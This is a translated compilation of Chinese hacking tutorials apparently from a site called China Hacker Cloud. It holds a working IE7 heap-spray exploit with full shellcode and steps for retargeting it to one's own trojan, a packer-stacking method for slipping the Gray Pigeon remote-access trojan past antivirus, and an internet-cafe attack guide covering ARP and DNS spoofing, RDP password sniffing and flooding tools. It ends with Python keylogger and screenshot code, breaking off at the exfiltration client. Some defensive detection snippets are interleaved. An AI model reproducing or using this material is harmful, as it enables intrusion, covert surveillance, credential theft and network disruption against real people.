Modifying the latest (2017) IE 0day sample web trojan

The latest trending web trojan (网马) sample, IE7 0day + shellcode + exe, is out. I just saw it and found it quite novel. Since it is still only a sample, turning it into your own trojan takes some work. With most web trojans you just swap the shellcode and you're done, but I've heard that if you only replace the shellcode IE crashes, so finding a suitable shellcode takes effort. There is a ready-made one here, so why waste it? Enough talk, let's start the analysis.

The web trojan sample is as follows (from www.hackerschina.org):

Code:

if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)location.replace("about:blank");

// busy-wait so the spray has settled before the trigger runs
function sleep(milliseconds)
{
    var start=new Date().getTime();
    for(var i=0;i<1e7;i++)
    {
        if((new Date().getTime()-start)>milliseconds){break}
    }
}

// heap spray: fill the heap up to 0x0a0a0a0a with 0x0a0a slide blocks followed by the shellcode
function spray(sc)
{
    var infect=unescape(sc.replace(/dadong/g,"\x25\x75"));   // "dadong" -> "%u"
    var heapBlockSize=0x100000;
    var payLoadSize=infect.length*2;
    var szlong=heapBlockSize-(payLoadSize+0x038);
    var retVal=unescape("%u0a0a%u0a0a");
    retVal=getSampleValue(retVal,szlong);
    aaablk=(0x0a0a0a0a-0x100000)/heapBlockSize;
    zzchuck=new Array();
    for(i=0;i<aaablk;i++){zzchuck[i]=retVal+infect}
}

// grow retVal by doubling until it covers szlong bytes, then trim to size
function getSampleValue(retVal,szlong)
{
    while(retVal.length*2<szlong)
    {retVal+=retVal}
    retVal=retVal.substring(0,szlong/2);
    return retVal
}

var a1="dadong";
spray(a1+"9090"+a1+"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");
sleep(3000);

nav=navigator.userAgent.toLowerCase();
if(navigator.appVersion.indexOf('MSIE')!=-1)
{
    version=parseFloat(navigator.appVersion.split('MSIE')[1])
}
if(version==7)
{
    w2k3=((nav.indexOf('windows nt 5.2')!=-1)||(nav.indexOf('windows 2003')!=-1));
    wxp=((nav.indexOf('windows nt 5.1')!=-1)||(nav.indexOf('windows xp')!=-1));
    if(wxp||w2k3)document.write(']]>');   // only the CDATA close survives here; the trigger markup is absent from the page
    var i=1;while(i<=10)
    {
        window.status=" ";i++
    }
}

First, everyone will naturally look for where the shellcode is. At first glance the shellcode in this sample looks a little different from other trojans; it has the form

a1+”9090″+a1+”dadong9090dadong9090dadongE1D9dadong34D9dadong5824dadong5858dadong3358dadongB3DBdadong031

Anyone who knows what they are looking at sees it immediately: this "encryption" is trivial to undo, and the decryption function is simply sc.replace(/dadong/g,"\x25\x75"), which turns every dadong back into %u.

Once decoded, the shellcode shows its true face:

Code:

u9090%u%u9090%u9090%uE1D9%u34D9%u5824%u5858%u3358%uB3DB%u031C%u31C3%u66C9%uE981%uFA65%u3080%u4021%uFAE2%u17C9%u2122%u4921%u0121%u2121%u214B%uF1DE%u2198%u2131%uAA21%uCAD9%u7F24%u85D2%uF1DE%uD7C9%uDEDE%uC9DE%u221C%u2121%uD9AA%u19C9%u2121%uC921%u206C%u2121%u67C9%u2121%uC921%u22FA%u2121%uD9AA%u03C9%u2121%uC921%u2065%u2121%u11C9%u2121%uC921%u22A8%u2121%uD9AA%u2DC9%u2121%uC921%u2040%u2121%u3BC9%u2121%uCA21%u7279%uFDAA%u4B72%u4961%u3121%u2121%uC976%u2390%u2121%uC4C9%u2121%u7921%u72E2%uFDAA%u4B72%u4901%u3121%u2121%uC976%u23B8%u2121%uECC9%u2121%u7921%u76E2%u1DC9%u2125%uAA21%u12D9%u68E8%uE112%uE291%uD3DD%uAC8F%uDE66%uE27E%u1F7A%u26E7%u1F99%u7EA8%u4720%uE61F%u2466%uC1DE%uC8E2%u25B4%u2121%uA07A%u35CD%u2120%uAA21%u1FF5%u23E6%u4C42%u0145%uE61F%u2563%u420E%u0301%uE3A2%u1229%u71E1%u4971%u2025%u2121%u7273%uC971%u22E0%u2121%uF1DE%uDDAA%uE6AA%uE1A2%u1F29%u39AB%uFAA5%u2255%uCA61%u1FD7%u21E7%u1203%u1FF3%u71A9%uA220%u75CD%uE112%uFA12%uEDAA%uD9A2%u5C75%u1F28%u3DA8%uA220%u25E1%uD3CA%uEDAA%uF8AA%uE2A2%u1231%u1FE1%u62E6%u200D%u2121%u7021%u7172%u7171%u7171%u7671%uC971%u2218%u2121%u38C9%u2121%u4521%u2580%u2121%uAC21%u4181%uDEDE%uC9DE%u2216%u2121%uFA12%u7272%u7272%uF1DE%u19A1%uA1C9%uC819%u2E54%u59A0%uB124%uB1B1%u55B1%u7427%uCDAA%u61AC%uDE24%uC9C1%uDE0F%uDEDE%uC9E2%uDE09%uDEDE%u3099%u2520%uE3A1%u212D%u3AC9%uDEDE%u12DE%u71E1%uC975%u2175%u2121%uC971%u23AA%u2121%uF1DE%uA117%u051D%u5621%uC92B%u2360%u2121%uDE12%uDE76%uC9F1%u20DA%u2121%uDE49%u2121%uDE21%uC9F1%uDFC9%uDEDE%u7672%u1277%u71E1%uC975%u213F%u2121%uC971%u2374%u2121%uF1DE%uA117%u051D%u5621%uC92B%u232A%u2121%uDE12%uDE76%u79F1%u7E7F%uE27A%u23CA%uE279%uD8C9%uDEDE%u77DE%uA276%u29CD%uDDAA%u294B%u1F76%u56DE%uC935%u237C%u2121%uF1DE%uDDAA%u4049%u444C%u4921%u6468%u5367%uD5AA%u2998%u2121%uD221%u5487%u4B0E%u1F21%u55DE%u0105%u05C9%u2123%uDE21%uAAF1%uC9D9%u20EA%u2121%uF1DE%uD91A%u2955%uAA17%u0565%u1F01%u21DE%uDE1F%u0555%uC93D%u20CE%u2121%uF1DE%uE5A2%u7E31%u997F%u2120%u2121%u49E2%u4F4E%u2121%u5449%u4D53%uCA4C%uAC34%u0565%u7125%u03C9%uDEDF%u71DE%u6BC9%u2123%
uC821%uDFC3%uDEDE%uC7C9%uDEDE%uA2DE%u29E5%u4BE2%u494D%u554F%u4D45%u34CA%u65AC%u2505%uC971%uDCDA%uDEDE%uC971%u2302%u2121%u9AC8%uDEDF%uC9DE%uDEC7%uDEDE%uE5A2%uE229%u1249%u2113%u4921%u5254%u5344%u34CA%u65AC%u2505%uC971%uDCF0%uDEDE%uC971%u20D8%u2121%uB0C8%uDEDF%uC9DE%uDEC7%uDEDE%uE5A2%uE229%u4249%u5657%u4921%u4952%u4E45%u34CA%u65AC%u2505%uC971%uDC86%uDEDE%uC971%u20EE%u2121%u46C8%uDEDF%uC9DE%uDEC7%uDEDE%uE5A2%uE229%u5749%u5946%uCA21%uAC34%u0565%u7125%uA3C9%uDEDC%u71DE%u8BC9%u2120%uC821%uDF63%uDEDE%uC7C9%uDEDE%uA2DE%u25E5%uC9E2%u208A%u2121%u3A49%u67E7%u7158%uE7C9%u2120%uA221%u29E5%uC9E2%u20B6%u2121%uCD49%u22B6%u712D%u93C9%u2120%uA221%u29E5%uC9E2%u20A2%u2121%u8B49%u2CDD%u715D%uBFC9%u2120%uA221%u29E5%uC9E2%u204E%u2121%uCC49%uCE77%u7117%uABC9%u2120%uA221%u29E5%uC9E2%u207A%u2121%uD149%u25AB%u717E%u57C9%u2120%uA221%u29E5%uC9E2%uDFD6%uDEDE%u5949%uFA49%u713D%u43C9%u2120%uA221%u29E5%uC9E2%u2012%u2121%uCE49%uC1EF%u7141%u6FC9%u2120%uA221%u29E5%uC9E2%u203E%u2121%u9149%u0C68%u71FA%u1BC9%u2120%uA221%u29E5%uC9E2%uDE17%uDEDE%u8A49%uBA7F%u713F%u07C9%u2120%uA221%u29E5%uC9E2%uDF86%uDEDE%u7849%uA0B6%u7123%u33C9%u2120%uA221%u29E5%uC9E2%u21C2%u2121%u5F49%uC3F9%u7152%uDFC9%u2121%uA221%u29E5%uC9E2%u21EE%u2121%uBF49%u9AD8%u7114%uCBC9%u2121%uA221%u29E5%uC9E2%uDFB3%uDEDE%u7649%u9481%u719A%uF7C9%u2121%uA221%u29E5%uC9E2%uDF5F%uDEDE%u3B49%u3F5B%u7123%uE3C9%u2121%uA221%u29E5%uC9E2%uDF4B%uDEDE%uC149%u117A%u71B5%u8FC9%u2121%uA221%u29E5%uC9E2%uDF77%uDEDE%uB649%uC3E8%u7182%uBBC9%u2121%uA221%u29E5%uC9E2%uDF63%uDEDE%u4949%uE405%u7192%uA7C9%u2121%uA221%u29E5%uC9E2%u2176%u2121%u5349%u92DF%u7137%u53C9%u2121%uA221%u29E5%uC9E2%uDF65%uDEDE%u32CA%u444B%uC971%uDAD6%uDEDE%uC971%uDF8A%uDEDE%u96C8%uDEDD%uC9DE%uDEC9%uDEDE%uC9E2%uDC88%uDEDE%u6E49%u6ECE%u7124%u1FC9%u2121%uA221%u29E5%uC9E2%u212E%u2121%uAF49%u2F6F%u71CD%u0BC9%u2121%uA221%u29E5%u12E2%u45E1%u61AA%uA411%u59E1%u1F31%u61AA%u1F2D%u51AA%u8C3D%uAA1F%u2961%uCAE2%u1F2A%u61AA%uA215%u5DE1%uAA1F%u1D61%u41E2%uAA17%u054D%u1705%u64AA%u171D%u75AA%u5924%uF422%uAA1F%u396B%uA
A1F%u017B%uFC22%u1AC2%u1F68%u15AA%u22AA%u12D4%u12DE%uDDE1%uA58D%u55E1%uE026%u2CEE%uD922%uD5CA%u1A17%u055D%u5409%u1FFE%u7BAA%u2205%u47FC%uAA1F%u6A2D%uAA1F%u3D7B%uFC22%uAA1F%uAA25%uE422%uA817%u0565%u403D%uC9E2%uDA47%uDEDE%u5549%u5155%u0E1B%u560E%u5656%u430F%u4840%u444A%u0F42%u4F42%u450E%u564E%u0E4F%u4E4A%u440F%u4459%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u0021

With the shellcode in hand, the next step is to pick up the tools and analyze it. First convert the shellcode into an exe file and load it into OllyDbg (OD).

Single-step through it and pay attention when you reach the following location, as shown in the figure:

XOR BYTE PTR DS:[EAX],21

This is the routine that decrypts the shellcode. The shellcode is XOR-encrypted, and you can see here that the key is 0x21, which makes things easy.

We take this part of the shellcode:

Code:

%u5549%u5155%u0E1B%u560E%u5656%u430F%u4840%u444A%u0F42%u4F42%u450E%u564E%u0E4F%u4E4A%u440F%u4459%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u0021

Once you understand the above, turning this web trojan into your own is simple!

Just XOR the address of your own trojan with 0x21, convert it to the same %u unicode form to replace the original bytes, and encrypt the unicode the same way as described above, and the modification is done!!!

Once the principle is understood, writing a generator is no big deal either.
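The two layers described above (the "dadong" substitution for %u, then a single-byte XOR with 0x21 over the little-endian UTF-16 bytes) can be undone mechanically by an analyst. The following decoder is an added example, not code from the page; it embeds the tail segment quoted above as its sample input (labelled SAMPLE_TAIL) and lists the readable strings that fall out, which is how you would confirm what a sample of this kind downloads without running it.

```python
import re

# XOR key seen in the OllyDbg trace above: XOR BYTE PTR DS:[EAX],21
XOR_KEY = 0x21

# Tail segment of the decoded shellcode quoted on the page (the run starting at %u5549).
# The trailing %u2121 units are XOR-encoded NUL padding.
SAMPLE_TAIL = (
    "%u5549%u5155%u0E1B%u560E%u5656%u430F%u4840%u444A%u0F42%u4F42"
    "%u450E%u564E%u0E4F%u4E4A%u440F%u4459%u2121%u2121%u2121%u0021"
)


def unicode_escapes_to_bytes(text):
    """Lay out %uXXXX escapes the way unescape() places them in memory.

    Each escape is one UTF-16 code unit stored little-endian, so %u5549 becomes
    the two bytes 0x49 0x55.
    """
    out = bytearray()
    for unit in re.findall(r"%u([0-9A-Fa-f]{4})", text):
        value = int(unit, 16)
        out.append(value & 0xFF)
        out.append(value >> 8)
    return bytes(out)


def xor_bytes(data, key):
    """Single-byte XOR; the same operation encodes and decodes."""
    return bytes(b ^ key for b in data)


def printable_strings(data, min_len=4):
    """Printable ASCII runs of at least min_len bytes, like the `strings` utility."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.decode("ascii") for m in re.findall(pattern, data)]


def recover_strings(encoded, key=XOR_KEY):
    """Undo both layers the page describes: the 'dadong' -> '%u' substitution,
    then the single-byte XOR, and return the readable strings."""
    raw = unicode_escapes_to_bytes(encoded.replace("dadong", "%u"))
    return printable_strings(xor_bytes(raw, key))


if __name__ == "__main__":
    for s in recover_strings(SAMPLE_TAIL):
        print(s)
```

Feeding the whole dump instead of only the tail works the same way; strings shorter than min_len are dropped so the instruction bytes do not clutter the output. The recovered URL is the indicator to block and to search proxy logs for.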

China Hacker Cloud teaches you AV evasion (免杀)

AV evasion (免杀) is a topic that never goes out of fashion in hacker circles. From the first clash between trojans and antivirus software it has never stopped: malware authors and antivirus engineers have been contending all along. Faced with powerful antivirus products, evasion becomes especially important for a virus. Evasion methods basically come in three kinds: modifying signatures, adding junk instructions, and packing. This time 危险漫步 will talk about packing, the most common evasion method.

Some animals and plants have hard shells because their bodies are fragile and need a hard shell for protection. By the same logic a kind of program called a packer ("shell") appeared. Packers were originally created to protect one's own program from being cracked and modified; since a virus is just a special kind of program, packers can protect viruses just as well, and with that the purpose of packers changed completely. Nowadays, when packers are mentioned, everyone thinks of AV evasion.

Generally speaking, packers come in two kinds: encryption packers and compression packers. An encryption packer mainly encrypts the program, but the packed program grows in size. A compression packer mainly compresses the program and reduces its size. There are also some special packers that both encrypt and compress.

Packing is a decent evasion method, but as antivirus software spreads and virus databases grow daily, more and more packed programs are being listed as viruses. So can we still use these packers to evade detection? YES! But we have to tinker a little.

If you only add a single packer, it will be detected before long; with bad luck it gets killed instantly by proactive defense and cloud scanning...

We can combine several packers to pack a program, the "compound packing" of the title; this too can achieve evasion.


I will use packing Gray Pigeon (灰鸽子) as an example to give you the idea of compound packing. Note: the file to be packed must not be in RAR format; here I use a Gray Pigeon build that has not been UPX-compressed. First load the Gray Pigeon server with an encryption packer; the one I used is a foreign one called "KeyCrypter". Its evasion effect is very good and it is powerful. But note: try to choose less common packers, and apply a fair number of them, not just one or two.

Also, packing does not mean 100% evasion; it still depends on our continuous analysis and testing. China Hacker Cloud official site: hackerschina.org


A brief introduction to how to use it: on the left you select the file to pack, on the right you set the output location. Tick all the options below; they mean anti-decompile, anti-sandbox and so on, so just select them all. Then click "Crypt File" and Gray Pigeon has its encryption packer.

We cannot add the compression packer yet, because every packer's compatibility differs, so we must first do resource release processing. For this we use "FreeRes". After releasing the resources, choose "Build editable resources" under "Functions" to rebuild the file's resources.

Next we use the compression packers. I chose "Ant packer (蚂蚁加壳工具)" and "Mini_pack", both compression packers; in my tests neither needs resource release processing before compressing. Tick the configuration, locate the server executable and pack it a second time. After compression, the packed Gray Pigeon was run past Rising, Kaspersky and 360 without any alerts.
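From the defender's side, the stacked encryption and compression layers just described leave a measurable trace: the packed body has near-uniform byte statistics. The following entropy triage check is an added example, not code from the page or from any of the packers named; the two samples it scores (PLAIN_SAMPLE, PACKED_SAMPLE) are constructed stand-ins for an unpacked and a packed executable, and the 7.0 bits/byte threshold and 1024-byte window are assumptions to tune against your own file corpus.

```python
import hashlib
import math
from collections import Counter


def shannon_entropy(data):
    """Bits per byte: 0.0 for a constant buffer, 8.0 for perfectly uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def windowed_entropy(data, window=1024):
    """Entropy of each consecutive window; packed or encrypted regions show up as a run of high values."""
    return [shannon_entropy(data[i:i + window]) for i in range(0, len(data), window)]


def looks_packed(data, threshold=7.0, window=1024, min_fraction=0.5):
    """Heuristic: flag the file when at least min_fraction of its windows exceed threshold bits/byte."""
    ents = windowed_entropy(data, window)
    if not ents:
        return False
    high = sum(1 for e in ents if e >= threshold)
    return high / len(ents) >= min_fraction


def pseudo_random_bytes(n, seed=b"seed"):
    """Deterministic high-entropy filler (constructed stand-in for a compressed or encrypted section)."""
    out = bytearray()
    block = seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out.extend(block)
    return bytes(out[:n])


# Constructed samples, not real executables: repetitive text versus a mostly random body.
PLAIN_SAMPLE = b"MZ" + b"This program cannot be run in DOS mode.\r\n" * 200
PACKED_SAMPLE = b"MZ" + b"\x00" * 512 + pseudo_random_bytes(16 * 1024)


if __name__ == "__main__":
    for name, sample in (("plain", PLAIN_SAMPLE), ("packed", PACKED_SAMPLE)):
        print(name, round(shannon_entropy(sample), 2), looks_packed(sample))
```

Entropy alone is not a verdict (installers and media-heavy binaries score high too); it is a triage signal that says "look at this one", which is exactly the case the compound-packing trick is meant to slip past signature matching.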

China Hacker Cloud teaches you how to attack an internet cafe (stress test); we only upload the tools.

Dear users, hello. It has been a long time since we published a tutorial. A while ago, while playing in an internet cafe, I had the sudden idea of attacking the cafe as a stress test; [LOL cafe] insufficient bandwidth is the common ailment of all internet cafes.
First, some cafes have set up security and security modules that disable tools such as ARP sniffers. Because the corresponding dlls are missing, some tools cannot be used, so here we provide some basic patches: dlls that work in every cafe, 32-bit and 64-bit. Copy the download address and paste it into your browser.
Click here to download: the Cain LAN penetration tool. After downloading, install the dll patch according to whether the cafe machine is 32- or 64-bit.
Below is a tutorial on using Cain; if you have trouble using it, read this article to the end for an in-depth study. The screenshots and photos from the day we attacked the cafe are gone (we were afraid the network admin would find out, so we didn't take pictures; sorry everyone).
If you can't follow this step, skip straight to the next step:

Basic usage of some LAN penetration tools:
Cain & Abel is a free password recovery tool for Microsoft operating systems developed by Oxid.it, billed as the poor man's L0phtCrack. It is very powerful: it can sniff the network, perform network spoofing, crack encrypted passwords, decode scrambled passwords, reveal password boxes, show cached passwords and analyze routing protocols; it can even listen in on VoIP calls made by others on the LAN.

Abel is the background service and is rarely used; we focus on using Cain.

Installing Cain: first install the WinPcap driver,

[Screenshot from the "Cain LAN sniffing tool tutorial" by yes_root]

then click Next all the way through and it installs.

Now we can use Cain. Open the legendary Cain; the interface is simple and clear, but its features are anything but simple.

Using Cain:

1. Reading cached passwords: switch to the "Protected Storage" tab and click the plus sign at the top.

All the passwords cached in IE are shown.

2. Viewing the network

Switch to the "Network" tab and you can clearly see the structure of the current network. I can also see the shared directories, users and services of the other machines on the LAN; from the screenshot we can see that Smm-DB1 has the IPC$ default share and hidden drive shares enabled.

3. ARP spoofing and sniffing

ARP spoofing works by manipulating the ARP cache tables of two hosts so as to change the normal direction of traffic between them; the result of this traffic injection is an ARP spoofing attack. ARP spoofing and sniffing are Cain's most used features. Switch to the "Sniffer" tab.

Here you can clearly see the IP and MAC addresses of every machine on the LAN.

First we need to configure Cain: click "Configure" at the top.

Under "Sniffer" select the network adapter to sniff on; under "ARP (Arp Poison Routing)" you can forge the IP and MAC addresses used for spoofing to avoid being noticed by the admin.

Under "Filters and ports" you can set filters, and choose the ports to filter according to your needs; for example, to sniff Remote Desktop passwords, tick RDP 3389.

Tip: for example, to sniff the machine 61.132.223.10 above, my second adapter shows my IP as 61.132.223.26, on the same LAN as the target, so I use the second adapter for spoofing.

Click the network-card icon to start sniffing; the radiation icon next to it is ARP spoofing.

After sniffing for a while, click "Passwords" at the bottom; the sniffed passwords are shown by category, including HTTP, FTP, VNC, SMTP, ICQ and others. If the target uses a VoIP phone you even get recordings of their VoIP calls (scary, isn't it?), as in the figure.

Now let's do ARP spoofing: click the "ARP" tab at the bottom, click in the blank area on the right, then the plus sign at the top; the "New ARP Poison Routing" dialog appears. Select the gateway on the left and the IP to be spoofed on the right.

Note that if your machine performs worse than the gateway, the spoofed machine will become slow.
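The ARP poisoning just described is visible to anyone watching the LAN: the gateway's IP suddenly answers from a second MAC, and one MAC starts claiming several IPs. The following detector is an added example, not code from the page or from Cain; it runs over a constructed list of ARP observations (ARP_OBSERVATIONS, using the tutorial's gateway .4, target .10 and sniffing host .26 with made-up MACs) and raises the two alerts a tool like arpwatch would.

```python
from collections import defaultdict

# Constructed ARP observations (timestamp, sender IP, sender MAC) as a passive listener on the
# LAN would record them from ARP replies. The IPs are the ones used in the tutorial above; the
# MACs are made up. From ts 4 on, the host with MAC ...:26 claims the gateway's IP and then
# the target's IP as well, which is what a man-in-the-middle between the two looks like.
ARP_OBSERVATIONS = [
    (1, "61.132.223.4",  "00:11:22:33:44:04"),
    (2, "61.132.223.10", "00:11:22:33:44:0A"),
    (3, "61.132.223.4",  "00:11:22:33:44:04"),
    (4, "61.132.223.4",  "00:11:22:33:44:26"),
    (5, "61.132.223.10", "00:11:22:33:44:26"),
]


def detect_arp_spoofing(observations):
    """Return alerts for an IP whose MAC changes and for a MAC that claims several IPs.

    Each alert is a dict whose 'kind' is 'ip-mac-changed' or 'mac-claims-multiple-ips'.
    """
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    alerts = []
    for ts, ip, mac in observations:
        mac = mac.lower()
        previous = ip_to_mac.get(ip)
        if previous is not None and previous != mac:
            alerts.append({"ts": ts, "kind": "ip-mac-changed", "ip": ip,
                           "old_mac": previous, "new_mac": mac})
        ip_to_mac[ip] = mac
        mac_to_ips[mac].add(ip)
        if len(mac_to_ips[mac]) > 1:
            alerts.append({"ts": ts, "kind": "mac-claims-multiple-ips", "mac": mac,
                           "ips": sorted(mac_to_ips[mac])})
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoofing(ARP_OBSERVATIONS):
        print(alert)
```

A replaced gateway NIC or a DHCP lease moving between machines triggers the first alert too, so in practice it is paired with a known-good gateway MAC (or a static ARP entry for the gateway on clients) and with Dynamic ARP Inspection on managed switches, which is the control that stops the poisoning rather than merely reporting it.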

1. DNS spoofing:

Under "DNS Spoofing" fill in the requested DNS name and the IP address for the response packet, as shown; when the target visits www.hao123.com it is automatically redirected to Www.google.cn, and "#resp. spoofed" is the number of times the target host has been spoofed.

This is also a clever way to serve a web trojan to the target machine. Click the radiation icon at the top to start ARP spoofing.

Tip: the gateway IP can be obtained by typing ipconfig at the command line.

As shown, the gateway IP is 61.132.223.4.

2. Remote Desktop spoofing:

Cain can run a man-in-the-middle attack against a remote computer's Terminal Services protocol (Remote Desktop Protocol, RDP), intercepting and decrypting it, i.e. capturing the target's 3389 login password.

Under "ARP-RDP" three packets have been captured. Right-click a captured packet on the right and choose "View".

I was lucky and got the user and password the target used to log in to 3389; as shown, the username is "administrator" and the password "asdf1234".

Tip: when sniffing passwords on a compromised machine (肉鸡), press Alt+Delete to hide the window, Alt+Page Down to hide the taskbar as well, and Alt+Page Up to bring the window back. This trick is very useful during LAN penetration!

4. Password cracking

Cain also has powerful cracking features: it can crack MD5, MD4, PWL, MSSQL and other hashes. Here I show how to crack an MD5 hash with Cain.

Switch to the "Cracker" tab, click in the blank area on the right, press the plus sign at the top and enter the 32-character hash to crack.

Right-click the hash, choose "Brute-Force Attack", and select the password length and character set; here I chose 5 to 6 digit numeric passwords.

Press "Start" to crack.

After a moment the cracked password appears: it is 123456. Besides brute force you can also crack with a dictionary or with rainbow tables.

Reading some other common passwords works as in the figure below.

It is very simple; have a look yourselves. The hash calculator looks like this:

It can compute MD2, MD5, LM, NT and other hashes of a given text.

5. Traceroute

Switch to the "Traceroute" tab and enter the target's IP or domain name; I entered www.hackerxfiles.net.

Choose the protocol and port and click "Start"; after a cup of coffee you can clearly see every server IP on the way to the Hacker X-Files BBS, the time taken and the host names.

Cain also has "LSA Secrets" and "Wireless Scanner" features that we rarely use; interested readers can explore them. The latest version, Cain 4.92, adds Vista support, but the "cached passwords" feature is not very stable; if you need it, use an older version. One last word: Cain is indeed an excellent tool in the hacker's arsenal, with boundless power; use it with caution.

Step 2: download 网络超级邻居 (Network Super Neighbor) and P2P网络终结者 (P2P Terminator).
Network Super Neighbor can detect every online host and shared host on the LAN, and can scan open ports and detect server hosts; see how we use it below:
Open Network Super Neighbor and sniff every online host in the cafe directly, scan open ports such as 135, 3389 and 1433, search for online hosts with open ports, share your machine to every open host, and so on.
P2P Terminator can be downloaded from Baidu; if some dlls are missing, add Cain's dlls to install and use it.
Because Network Super Neighbor, P2P Terminator and Cain all share the ability to scan the LAN, it comes down to personal experience to find the relevant server host and the security module's server address. Use all three and judge by experience and the scan results. We will add pictures later.
Network Super Neighbor download: http://www.crsky.com/soft/2700.html

P2P Terminator download: http://www.cr173.com/soft/1953.html
These two programs can be downloaded from any Baidu download site, so if the two links above stop working, just search Baidu.

Step 3: 蜗牛攻击器终极版 (Snail Attacker Ultimate) download: https://binghesoft.ctfile.com/file/117068576 ; if that doesn't work, search Baidu for it.

Step 4: open Snail Attacker, P2P Terminator and Network Super Neighbor.
In Snail Attacker enter the target host to attack: 192.168.xxx.xxx
Add snails.
Be careful not to freeze your own machine; 4 or 5 are enough, choose the mode yourself.
P2P Terminator: global control, blacklist. This has some ARP effect, but it is not spoofing.
Use Cain to sniff account passwords on the hosts. [If you can't do this step, use the steps above.]

Step 5: after 7 to 8 minutes the whole cafe goes offline. Cain does not actually play much of a role here; we mention it so you can sniff some simple LAN passwords, as a kind of brute-force tool, LAN scanner and so on.

If the cafe doesn't drop: attack from two machines at once and it dies instantly... In our tests every cafe could be killed instantly; because of cafes' security problems and bandwidth response, it is normal for the cafe to die at once... We went to a cafe to test earlier, so we didn't dare take photos or video; we'll do it when we get the chance. If you can't manage it, follow our official WeChat account and leave a message; we have dedicated customer service to teach you.

China Hacker Cloud teaches you to write a trojan in Python

This time we use Python to write a simple trojan with keylogging, screenshot and communication features, still using Sublime Text 2 + JEDI (Python autocomplete plugin) to write the code. First prepare the dependencies we need: pyHook and pythoncom.

If that's a hassle, you can use the commercial ActivePython distribution, which bundles all the Python libraries we need. Recording everything you type: writing a keylogger. When keyloggers come up, your thoughts may already have flown to mini hardware devices with Wi-Fi. Setting high tech aside, let's return to the essence and explore how a simple keylogger works and is implemented. The Python keylogger is implemented mainly with pythoncom and pyHook, plus various Windows API calls. Python is convenient and quick largely thanks to these huge supporting libraries; as the saying goes, "life is short, use Python". The key code is as follows (Python 2; pyHook does not exist for Python 3):

# -*- coding: utf-8 -*-
from ctypes import *
import pythoncom
import pyHook
import win32clipboard

user32 = windll.user32
kernel32 = windll.kernel32
psapi = windll.psapi
current_window = None


def get_current_process():
    # handle of the foreground (topmost) window
    hwnd = user32.GetForegroundWindow()
    # process ID that owns it
    pid = c_ulong(0)
    user32.GetWindowThreadProcessId(hwnd, byref(pid))
    process_id = "%d" % pid.value
    # buffer for the executable name
    executable = create_string_buffer("\x00" * 512)
    h_process = kernel32.OpenProcess(0x400 | 0x10, False, pid)
    psapi.GetModuleBaseNameA(h_process, None, byref(executable), 512)
    # read the window title
    windows_title = create_string_buffer("\x00" * 512)
    length = user32.GetWindowTextA(hwnd, byref(windows_title), 512)
    # print a header for the new window
    print
    print "[ PID: %s - %s - %s ]" % (process_id, executable.value, windows_title.value)
    print
    # close handles (hwnd is a window handle, not a kernel object, so the first call is a harmless no-op kept from the original)
    kernel32.CloseHandle(hwnd)
    kernel32.CloseHandle(h_process)


# keystroke listener
def KeyStroke(event):
    global current_window
    # did the target window change? (a new window gets a new header)
    if event.WindowName != current_window:
        current_window = event.WindowName
        get_current_process()
    # ordinary printable key (not a modifier or combination)
    if event.Ascii > 32 and event.Ascii < 127:
        print chr(event.Ascii),
    else:
        # on Ctrl+V record the clipboard contents
        if event.Key == "V":
            win32clipboard.OpenClipboard()
            pasted_value = win32clipboard.GetClipboardData()
            win32clipboard.CloseClipboard()
            print "[PASTE] - %s" % (pasted_value),
        else:
            print "[%s]" % event.Key,
    # pass the event on and keep listening
    return True


# create and register the hook manager
kl = pyHook.HookManager()
kl.KeyDown = KeyStroke
# install the hook and pump messages
kl.HookKeyboard()
pythoncom.PumpMessages()

[Knowledge point] Hook: a platform in the Windows message handling mechanism on which an application can install a subroutine to monitor a certain kind of message for a specified window; the monitored window can be one created by another process. When writing the code be careful about case. After checking it, start the keylogger, then open Notepad and type something; you can see our keylogger window recording the input in real time, as shown in Figure 1.

Figure 1

When you switch windows it automatically tracks the new window. Professor light took the opportunity to pester 疯狗; you can see our keylogger has tracked the QQ chat window and faithfully recorded everything typed, as shown in Figure 2.

Figure 2

Seeing what you are doing: writing a screenshotter. Taking a screenshot is even simpler, just a few GUI-related API calls; let's look at the code.

# -*- coding: utf-8 -*-
import win32gui
import win32ui
import win32con
import win32api

# desktop window handle
hdesktop = win32gui.GetDesktopWindow()
# size and origin of the virtual screen (covers all monitors)
width = win32api.GetSystemMetrics(win32con.SM_CXVIRTUALSCREEN)
height = win32api.GetSystemMetrics(win32con.SM_CYVIRTUALSCREEN)
left = win32api.GetSystemMetrics(win32con.SM_XVIRTUALSCREEN)
top = win32api.GetSystemMetrics(win32con.SM_YVIRTUALSCREEN)
# device context of the desktop
desktop_dc = win32gui.GetWindowDC(hdesktop)
img_dc = win32ui.CreateDCFromHandle(desktop_dc)
# memory device context to draw into
mem_dc = img_dc.CreateCompatibleDC()
# bitmap object that receives the capture
screenshot = win32ui.CreateBitmap()
screenshot.CreateCompatibleBitmap(img_dc, width, height)
mem_dc.SelectObject(screenshot)
# copy the screen into the memory device context
mem_dc.BitBlt((0, 0), (width, height), img_dc, (left, top), win32con.SRCCOPY)
# save the capture to a file
screenshot.SaveBitmapFile(mem_dc, 'c:\\WINDOWS\\Temp\\screenshot.bmp')
# release resources
mem_dc.DeleteDC()
win32gui.DeleteObject(screenshot.GetHandle())

Run it and see the result, Figure 3.

Figure 3

Putting it together: a simple trojan

Whether it is the keylogger's records or the screenshotter's images, they are of little use sitting on the client alone; we need a simple server and client for communication, to send the recorded content to our server.

1) Writing a simple TCP client

# -*- coding: utf-8 -*-
